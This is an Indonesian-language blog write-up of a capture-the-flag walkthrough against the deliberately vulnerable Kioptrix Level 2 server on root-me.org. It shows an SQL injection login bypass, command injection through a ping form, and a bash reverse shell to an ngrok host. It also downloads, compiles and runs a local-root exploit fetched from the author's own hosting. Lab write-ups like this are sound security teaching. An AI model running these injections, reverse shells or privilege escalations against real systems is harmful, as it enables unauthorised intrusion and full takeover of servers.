Write Up CTF Root-Me.org - Hacking Kioptrix Server Level 2

Pada kesempatan kali ini saya akan membuat write up tentang CTF pada website root-me.org yang tersedia di CTF all the day yang akan saya bahas disini yaitu Hacking Kioptrix Server Level 2, perlu diketahui kioptrix server adalah server yang sengaja dibuat untuk diacak-acak untuk tujuan pembelajaran hacking server sendiri, kioptrix server tersedia sampai level 4 dan yang akan saya bahas kali ini adalah kioptrix server level 2 dimana yang tersedia di website root-me.org hanya 2,3,4 tidak ada level 1, level yang lain akan menyusul akan saya buat write up nya.

1. Disini saya diberikan domain http://ctf05.root-me.org untuk melakukan penetration testing

2. Lalu saya melakukan scanning port dengan menggunakan nmap dengan perintah
$ nmap -sV ctf05.root-me.org


3. Disini saya lihat bahwa port 80 terbuka dimana port 80 itu adalah protokol HTTP.

4. Setelah saya buka di browser link tersebut diarahkan ke halaman administrator, lalu saya mencoba view source ternyata tidak ada yang mencurigakan.

5. Lalu saya mencoba masuk menggunakan metode SQL Injection bypass login dengan memasukan 

user : ' OR '1'='1'-- 
pass : ' OR '1'='1'-- 

dan ternyata berhasil masuk

6. Disini ada yang namanya sebuah form dan saya mencoba mengisikan 127.0.0.1, dan ternyata reply from.
7. Lalu saya akan mencoba untuk menggunakan metode command injection dengan memasukan perintah
127.0.0.1 && ls /
dan ternyata menampilkan folder yang berada didalam server tersebut
8. Lalu saya mencoba untuk melakukan metode bash reverse shell dengan memasukan exploit
127.0.0.1 && bash -i >& /dev/tcp/0.tcp.ngrok.io/16690>&1
Tetapi sebelum itu saya melakukan port forwarding menggunakan ngrok, lalu sesuaikan domain dan port yang telah didapatkan, setelah didapat jangan submit dulu saya akan menggunakan listener terlebih dahulu menggunakan netcat.

9. Lalu saya membuka netcat untuk listening port yang telah saya buat tadi dengan perintah 
$ nc -lvp 4444
setelah itu submit kode bash reverse shell tadi di form website
lalu pada terminal akan berubah seperti ini ketikkan perintah uname -a untuk memastikan bahwa saya sudah masuk ke server kioptrix tersebut

10. Selanjutnya kita inject server tersebut dengan localroot anda bisa mendapatkannya di tools yang bernama searchsploit atau bisa mencari di google atau di exploit-db juga ada.
oh iya disini kenapa kita harus menggunakan exploit localroot karena kita disini membutuhkan akses root untuk bisa membaca folder /passwd dimana flag nya berada disitu jika saya melakukan perintah cat /passwd pasti akan permission denied karena user kita bukan root

Disini kita berada didalam user (apache)
11. Lalu saya akan masuk ke direktory /tmp dahulu sebelum memasukan exploit karena jika tidak akan gagal karena system akan menampilkan permission denied
lalu saya langsung mendownload localroot yang sudah saya upload di hosting dengan perintah

$ wget https://maklogans.000webhostapp.com/9545.c --no-check-certificate

12. Setelah file sudah berada di dalam selanjutnya saya melakukan compile dahulu exploitnya dengan perintah

$ gcc 9545.c -o exploit

13. Lalu langsung saya execute exploit tadi dengan perinatah ./exploit
dan voila! user yang tadinya (apache) sekarang berubah menjadi (root)

14. Tanpa basa basi saya langsung melakukan 


$ cat /passwd
dan mendapatkan sebuah flag seperti berikut

15. Lalu saya mencoba submit di website root-me.org, dan ternyata benar!

Sekian write-up atau tutorial cara hacking kioptrix server level 2 yang berada di website root-me.org saya mohon maaf bila tutorial nya membingungkan, saya juga bingung hehe lain waktu mungkin saya akan membuat video nya jika ada permintaan dari teman-teman, jika ada yang masih bingung atau belum mengerti bisa meninggalkan komentar, nanti saya juga akan membuat write-up lagi, see you !

Post a Comment

0 Comments